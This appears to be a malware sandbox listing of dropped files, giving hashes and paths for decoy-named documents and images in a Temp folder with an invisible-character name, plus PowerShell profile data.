MD5 a5a0ca71b9eda5b19b86c69aadef8d6a
SHA1 1521c7c3b481c62fc4c0c8d14934857e5127c4b0
SHA256 49938ecc2e3f9d79f9aefed69ae5223f956c852b0b10a26d82ac509952ce2467
SHA512 0bebe5ff5aed37baa58c18ba780a4369d1d3844ff0e365c841d801b1817b303e5d855d936bde2b076a7dc44e43ec00bad2ab146e7d5b51da9f83f65eacccc0f0

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Music\DisableCompress.pdf

MD5 f7aced9b69a4ab74b6ebed0c4f28fb46
SHA1 18bb5a525bf8fb3301219d2fae59951827e16596
SHA256 a855eeaa1a4b15790d4affa7f7f31d950efe79270359362a1f0fe4c8de9d9a81
SHA512 9cbd367e330d17db66c82e545c8697cc7491bd25e477d7c32c8df57f8615879e57aea560d0ce4809ac729ed606a44554347e772d0aabe67269e7cea862cdec5d

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Downloads\BackupSwitch.AAC

MD5 53a033d3b4106a7ad2b30ecd13f85bb1
SHA1 19f619ed5ce69ae05049128f8812fee4d895979d
SHA256 d9617735d182812c4f5a8a39d44efa06b9248d0eb4eb14edd10b20051754ce72
SHA512 c71d46fbb74ba130bee06c20f10cc8d8c9c30af8117955b176cb97c2a941abb5ddc743d8cd10e6263af7b47af1b47edde91c40f0e676901b56c517603ecd5680

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Pictures\CopyInitialize.png

MD5 4ff701e67842bd90c89320706e7500a5
SHA1 fcc4fd82f0858b4f6e075701e0feca7036111682
SHA256 c19e8b9ee12d661e3c5d59d1ee233921b5e197e6eb3642ff749a637ed830fe5a
SHA512 86c430ac60441b45ac7c486f15c0e6e1baf62011f6f83cf0bafaddac101ba9ab2f7779b086ac7603317e0b916717b06e730f546d55dd54f61fea107059e734ff

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\GrantExpand.xlsx

MD5 f8e3dfd7cd2b2656593f7fe80e5aba1b
SHA1 407d8d854ab19b559a81217f131eb9c6d0c04a03
SHA256 554c31ceefba842ba6aa8ddee6e7bcce2368abb8e90145b3d566cae691cd1db1
SHA512 a35147f6b9f2df6080a44ebce7eea6d02d590bcfad4e3af71d5dfd884edcf587cbab8046423a2906801f60e6c1e5591938479932e0509418ed5c90748747587d

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\GrantCompare.xlsx

MD5 07a872ba34b0fa839b5797fbe23405ec
SHA1 494695d5866b4c2c188297bbb13b3dd54f4a1de2
SHA256 01c69992a678e84094fd7f001326f6601af0f885b6c96ec8e183dd5cf64c05cc
SHA512 b1f8f670b9773fa1e4f55166dbf38b585ecd8ccf74ec3a467bab760aeb024f0399585ff2d4bbb60c019de269441d2e6883a6ad88394c5064e56fe39fca0e053c

C:\Users\Admin\AppData\Local\Temp\  ‎  ‍‎‎  \Common Files\Documents\CompleteInitialize.xlsx

MD5 09bbbf66f09a8e225971f4a42bc1376f
SHA1 7f7547a31c4849f58cbb3d93adee9c51c7515599
SHA256 543b72505a4150809ed6258e2314a2ffab5198b77d8816fa8a110edde78c10d6
SHA512 efbe742696d37aa8203ede2cf811b40a963de1ca8a4027a61350be86969aee74b202b789c3ea205eb0c92571cd1e21ea8a313d5ec470627cf6d1d87b1eff4b73

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ec79fae4e7c09310ebf4f2d85a33a638
SHA1 f2bdd995b12e65e7ed437d228f22223b59e76efb
SHA256 e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a
SHA512 af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a67eee085e8f68aaffbfdb51503d6561
SHA1 29db9b41945c6a5d27d5836a1c780668eded65a0
SHA256 6e155bcc98f4e175a8701f030b73b14d9002b175ef58a19cb9010af3964e36b4
SHA512 7923bc74260e77d62b20cf510b79e0422563469ec3543084a989db154b1e39370f1a6e6c6e73caa7471d0974a693b1beb4fd2ddfb14b0b5c58650b5df3c32d81